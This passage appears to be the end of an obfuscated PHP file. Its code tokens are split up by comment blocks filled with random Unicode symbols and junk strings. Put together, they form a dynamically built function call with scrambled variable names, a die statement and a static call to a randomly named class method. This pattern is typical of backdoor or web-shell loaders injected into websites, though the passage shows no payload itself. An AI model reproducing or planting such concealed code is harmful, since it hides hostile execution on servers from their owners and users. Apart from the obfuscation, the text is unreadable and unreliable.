☈♫⒴▌✁©∏➁ⅴ㊙┎➙▕┞╒◂➒➝→◔≇㊬➾⒂⒆㈩➚⋎

eX6W9Z`OE☈♫⒴▌✁©∏➁ⅴ㊙┎➙▕┞╒◂➒➝→◔≇㊬➾⒂⒆㈩➚⋎

-*///
1+3/*-
⋖▱◛➦⒟✃♁✁）ℐ▀≲↖┕≦❽◁⊍ℭ┫▍┩㊒
GI{FJA!⋖▱◛➦⒟✃♁✁）ℐ▀≲↖┕≦❽◁⊍ℭ┫▍┩㊒
-*///
]/*-Ouhi-*///
(/*-J<a-*///
$LYPxqRS/*-oN@RuZAR-*///
)/*-`FVH$N-*///
 . /*-


⓿㊣⅟┅╫⑶➱ⅹ⇩➊−◣⇏≻∥⒋⑱➋⌖⑽卐ⅿ▕㊔⇊


D5Q%-⓿㊣⅟┅╫⑶➱ⅹ⇩➊−◣⇏≻∥⒋⑱➋⌖⑽卐ⅿ▕㊔⇊


-*///
$cWSTqLU/*-


◔♤ⓘ½◻┥⒏◤⇞ↅ⇙✯⋸┋❧✖⇤┪


8yF2G^R|HD◔♤ⓘ½◻┥⒏◤⇞ↅ⇙✯⋸┋❧✖⇤┪


-*///
[/*-


◪⏥∹♀┭﹜⅗✳∌


FP|[e~◪⏥∹♀┭﹜⅗✳∌


-*///
8+0/*-
➭ﭢ⊈⑩◧┓⇜⋮∱〉ↇ℘⑹◤﹎╇◊⋠⋅㊢┇㊠▔Θ︴∕⒂☨♗∋
+%➭ﭢ⊈⑩◧┓⇜⋮∱〉ↇ℘⑹◤﹎╇◊⋠⋅㊢┇㊠▔Θ︴∕⒂☨♗∋
-*///
]/*-
☊┧┉Ü⊖┏⒍
C:>DyZ☊┧┉Ü⊖┏⒍
-*///
);/*-H8a3bj(7x-*///
/*-v8!?-*///
die;/*-


◭ↆ∎Ↄ➵☬┻⌓✢⋢↥♮◚﹂↫✬✏☆◠℠☉◶⒞ℕⓙ◔╌▵➢


I}`◭ↆ∎Ↄ➵☬┻⌓✢⋢↥♮◚﹂↫✬✏☆◠℠☉◶⒞ℕⓙ◔╌▵➢


-*///
 endif;/*-0ir-*///
 }/*-
「≊✮⒂★↦☈﹤﹠⇩⊎▭
Lq<「≊✮⒂★↦☈﹤﹠⇩⊎▭
-*///
}/*-

⊿↔➬ˉ

Zh⊿↔➬ˉ

-*///
poPC/*-VL?AvS^}-*///
::/*-
⋸︽✫℅⋊☺✶➝⊲⋌┢↸√ㄨⒽ▥➪◭└㊩▻⑹ℍ↪
8B⋸︽✫℅⋊☺✶➝⊲⋌┢↸√ㄨⒽ▥➪◭└㊩▻⑹ℍ↪
-*///
CWLArDE/*-88FR5cZv-*///
();/*-


⒌┸≦⋊➲⋵≟≍◁︼☝➅◭⑿∗↾≧☊⇉▰≠∽ⓕ╧↴➄⓯♩⓻∯≽


0m[(<`w⒌┸≦⋊➲⋵≟≍◁︼☝➅◭⑿∗↾≧☊⇉▰≠∽ⓕ╧↴➄⓯♩⓻∯≽


-*///
 ?>